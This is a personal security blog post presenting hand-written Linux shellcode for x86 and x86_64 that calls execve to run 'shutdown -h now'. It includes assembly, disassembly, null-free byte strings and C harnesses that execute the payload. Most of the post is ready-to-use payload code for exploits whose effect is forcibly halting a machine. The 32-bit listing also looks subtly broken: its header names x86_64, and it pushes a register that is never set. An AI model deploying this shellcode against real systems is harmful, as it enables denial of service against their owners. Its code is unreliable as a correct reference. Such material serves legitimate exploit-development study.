shutdown -h now Shellcode

This another small shellcode I’ve written for both linux x86 and x86_64 architectures. Let’s have a look at the Linux programmers manual about how execve() takes arguments.

#include <unistd.h>

int execve(const char *filename, char *const argv[],
           char *const envp[]);


This is my prototype C code corresponding to the above hypothesis.

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

int
main() {
        char *file[] = {NULL,"-h","now",NULL};
        file[0]="/sbin/shutdown";
        execve(file[0],file,NULL);
}

After developing the prototype it is easy to port the code into assembly. Here is the x86 version of it. I had to perform some pointer arithmetic to remove the bad chars. But it was really fun writing this piece of code.

; Title: shutdown -h now Shellcode - 56 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text
       global _start

_start:
        xor eax, eax
	xor edx, edx ; envp

	push eax
	push word 0x682d ;-h
	mov edi, esp

	push eax
	push byte 0x6e ; now
	mov [esp+1], word 0x776f
	mov edi, esp

	push eax
	push 0x6e776f64 ; /sbin/shutdown
	push 0x74756873
	push 0x2f2f2f6e
	push 0x6962732f
	mov ebx, esp

	push edx ; null envp
	push esi ; now null
	push edi ; -h null
	push ebx ; /sbin/shutdown null
	mov ecx, esp
	mov al, 11
	int 0x80

Well, the disassembly looks fine. No bad terminating nulls to be found.

Disassembly of section .text:

08048060 <_start>:
8048060:    31 c0                   xor    eax,eax
8048062:    31 d2                   xor    edx,edx
8048064:    50                      push   eax
8048065:    66 68 2d 68             pushw  0x682d
8048069:    89 e7                   mov    edi,esp
804806b:    50                      push   eax
804806c:    6a 6e                   push   0x6e
804806e:    66 c7 44 24 01 6f 77    mov    WORD PTR [esp+0x1],0x776f
8048075:    89 e7                   mov    edi,esp
8048077:    50                      push   eax
8048078:    68 64 6f 77 6e          push   0x6e776f64
804807d:    68 73 68 75 74          push   0x74756873
8048082:    68 6e 2f 2f 2f          push   0x2f2f2f6e
8048087:    68 2f 73 62 69          push   0x6962732f
804808c:    89 e3                   mov    ebx,esp
804808e:    52                      push   edx
804808f:    56                      push   esi
8048090:    57                      push   edi
8048091:    53                      push   ebx
8048092:    89 e1                   mov    ecx,esp
8048094:    b0 0b                   mov    al,0xb
8048096:    cd 80                   int    0x80

Here is the final shellcode in my C skeleton file.

#include <stdio.h>
#include <string.h>

unsigned char code[] =  "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
                        "\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
                        "\x44\x24\x01\x6f\x77\x89\xe7\x50"
                        "\x68\x64\x6f\x77\x6e\x68\x73\x68"
                        "\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
                        "\x2f\x73\x62\x69\x89\xe3\x52\x56"
                        "\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

int
main() {

	printf("Shellcode Length:  %d\n", (int)strlen(code));
	int (*ret)() = (int(*)())code;
	ret();

	return 0;
}

That was the 32-bit code. This is my 64-bit assembly code for shutdown -h now.

; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text

global _start

_start:

xor rax, rax
xor rdx, rdx

push rax
push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp

push rax
push word 0x682d ;-h
mov rcx, rsp

push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp

push rdx
push rbx
push rcx
push rdi
mov rsi, rsp

add rax, 59
syscall

The dissembly looks fine. No bad chars to be found.

Disassembly of section .text:

0000000000400080 <_start>:
  400080:	48 31 c0             	xor    rax,rax
  400083:	48 31 d2             	xor    rdx,rdx
  400086:	50                   	push   rax
  400087:	6a 77                	push   0x77
  400089:	66 68 6e 6f          	pushw  0x6f6e
  40008d:	48 89 e3             	mov    rbx,rsp
  400090:	50                   	push   rax
  400091:	66 68 2d 68          	pushw  0x682d
  400095:	48 89 e1             	mov    rcx,rsp
  400098:	50                   	push   rax
  400099:	49 b8 2f 73 62 69 6e 	movabs r8,0x2f2f2f6e6962732f
  4000a0:	2f 2f 2f
  4000a3:	49 ba 73 68 75 74 64 	movabs r10,0x6e776f6474756873
  4000aa:	6f 77 6e
  4000ad:	41 52                	push   r10
  4000af:	41 50                	push   r8
  4000b1:	48 89 e7             	mov    rdi,rsp
  4000b4:	52                   	push   rdx
  4000b5:	53                   	push   rbx
  4000b6:	51                   	push   rcx
  4000b7:	57                   	push   rdi
  4000b8:	48 89 e6             	mov    rsi,rsp
  4000bb:	48 83 c0 3b          	add    rax,0x3b
  4000bf:	0f 05                	syscall 

This is the final shellcode 🙂

#include <stdio.h>
#include <string.h>

unsigned char code[] =  "\x48\x31\xc0\x48\x31\xd2\x50\x6a"
                        "\x77\x66\x68\x6e\x6f\x48\x89\xe3"
                        "\x50\x66\x68\x2d\x68\x48\x89\xe1"
                        "\x50\x49\xb8\x2f\x73\x62\x69\x6e"
                        "\x2f\x2f\x2f\x49\xba\x73\x68\x75"
                        "\x74\x64\x6f\x77\x6e\x41\x52\x41"
                        "\x50\x48\x89\xe7\x52\x53\x51\x57"
                        "\x48\x89\xe6\x48\x83\xc0\x3b\x0f"
                        "\x05";

int
main() {

	printf("Shellcode Length:  %d\n", (int)strlen(code));
	int (*ret)() = (int(*)())code;
	ret();

	return 0;
}

I’ve opened a new page for my shellcodes. You can have a look over here https://osandamalith.wordpress.com/shellcodes/

For the last month I became a top author at PacketStorm

It’s really great to explore assembly and shellcoding.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s